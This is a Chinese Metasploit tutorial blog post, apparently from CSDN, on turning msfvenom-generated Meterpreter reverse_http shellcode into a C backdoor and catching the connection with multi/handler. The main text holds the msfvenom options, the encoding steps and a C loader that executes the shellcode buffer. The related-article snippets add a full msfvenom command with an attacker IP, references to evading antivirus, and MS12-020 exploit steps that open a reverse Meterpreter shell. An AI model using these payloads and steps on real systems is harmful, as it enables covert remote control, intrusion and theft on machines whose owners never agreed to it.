c语言msf,Metasploit应用笔记-msfvenom生成meterpreter后门代码

最新推荐文章于 2023-07-20 20:07:06 发布
最新推荐文章于 2023-07-20 20:07:06 发布
阅读量728 收藏
点赞数
文章标签: c语言msf

1 用msfvenom生成c语言格式的shellcode.

0818b9ca8b590ca3270a3433284dd417.png

windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。也可以使用-f exe 直接输出可执行的exe文件。

2 在C程序中调用Shellcode:

unsigned char buf[] =

"\xd9\xf6\xbe\xb2\x7c\x9f\x62\xd9\x74\x24\xf4\x5f\x29\xc9\xb1";

int _tmain(int argc, _TCHAR* argv[])

{

void (*fun)();

*(int*)&fun = (int)buf;

printf("Execute meterpreter shellcode.....\n");

fun();

return 0;

}

3 在attacker电脑上启动metasploit 控制台:msfcosole. 如图:

0818b9ca8b590ca3270a3433284dd417.png

解释一下命令

msf > use exploit/multi/handler               使用exploit/multi/handler监听连入的backdoor

msf  exploit(handler) > set payload windows/meterpreter/reverse_http            设置对应的payload。payload就是shellcode的意思。

msf  exploit(handler) > show options                         显示所有的设置

如果需要的话,可能还需要将LHOST,LPORT,设置成与shellcode中相同的地址和端口。

4 最后在attacker电脑上运行exploit命令,一旦有backdoor连进来,就可以用命令来控制目标了。

0818b9ca8b590ca3270a3433284dd417.png

知乎 MCN 小管家
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSFMsfvenom+Meterpreter
SoulCat
08-12 4086
MSFMsfvenom+Meterpreter 太极生两仪,两仪生四象, 四象生八卦,八卦衍万物。 然后呢? 万物不如你! Msfvenom: msfvenommsfpayload,msfencode的结合体,它的优点是单一命令行和效率.利用msfvenom生成各种版本木马程序,并在目标机上执行,在本地监听上线,执行攻击。 Options: -p, --payload 指定需要使用的payl...
64位Windows 10 shellcode,可使用Meterpreter反向shell注入所有进程。-.NET开发
05-27
Windows / x64-使用Meterpreter反向Shell注入所有进程(655字节)Windows / x64-使用Meterpreter反向Shell注入所有进程(655字节)Shellcode作者:Bobby Cooke(boku)日期:2021年5月1日经过测试:Windows 10 v2004 (x64)编译自:Kali Linux(x86_64)Shellcode说明:64位Windows 10 shellcode,用于注入具有Meterpreter反向shell的所有进程。 Shellcode首先通过Intel GS寄存器和主机进程进程环境块(PEB)动态解析内存中kernel32.dll的基地址。 然后再
反弹stage shellcode到meterpreter
thesum的专栏
05-12 708
1.在肉鸡上运行stage1的shellcode 2.在kali上运行metsploit framework 3.执行下面的命令 msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/revers
metasploit产生shellcode
天元喜羊羊的博客
05-01 5684
root@bt:~# msfpayload windows/shell/bind_tcp LPORT=443 C /* * windows/shell/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process, * Init
Msfvenom生成后门及运用
Tauil的博客
08-04 453
代码Msfvenom生成后门及运用。
metasploit-framework-master.zip
09-08
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测和利用工具,广泛应用于网络安全评估和渗透测试。它由 Rapid7 维护,是全球黑客社区的重要资源,同时也是信息安全专业人员的必备武器。"metasploit-...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
metasploit-framework-6.3.34.zip
最新发布
09-17
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会包含最新的功能、修复和性能改进。在网络安全领域,...
ProxyLogon-CVE-2021-26855-metasploit:CVE-2021-26855 proxyLogon metasploit利用脚本
03-17
ProxyLogon-CVE-2021-26855-metasploit CVE-2021-26855 proxyLogon metasploit利用脚本
msf-funny:我的功绩,辅助代码metasploit
05-13
MSF模块。 我创建的一些模块很有趣。 =]gmail_checker.rb 枚举gmail用户。 msf> use auxiliary/gather/gmail_checkermsf> set check_email email_target@gmail.commsf> run. . .WordPress枚举用户枚举管理用户。 msf...
C语言写的shellcode
03-05
C语言写的开端口的shellcode 打开9878端口的ShellCode源代码
Changing meterpreter reverse_http User-Agent and Server strings
weixin_33691700的博客
07-04 110
Changing meterpreter/reverse_http “User-Agent:” and “Server:” strings EDIT 2012-07-01: Please read HD’s comment below, as of 1st of July 2012, you can set “MeterpreterUserAgent” and “...
MSFvenom基础
子曰小玖的博客
05-16 1890
https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom kali自带的生成木马工具----Msfvenom Msfvenom是有效负载生成和编码的组合。它于2015年6月8日...
Metasploit应用笔记-msfvenom生成meterpreter后门代码
热门推荐
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c
Meterpreter命令详解
weixin_45605352的博客
04-18 4948
0x01初识Meterpreter 1.1.什么是Meterpreter    MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按
使用MSF生成的shellcode打造免杀payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
msf的实战使用——msfvenom
tomyyyyy
05-11 2891
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马免杀姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4301
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
超实用!手把手教你如何用MSF进行后渗透测试!
xv66666的博客
07-20 1114
Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。Meterpretermsf的一个payload,目标执行之后,我们会得到一个会话,和常见的shell会话类似,但是它的功能更加强大,它是执行后渗透测试的实施通道。msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
msf之ms12-020的复现
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码MSFMetasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值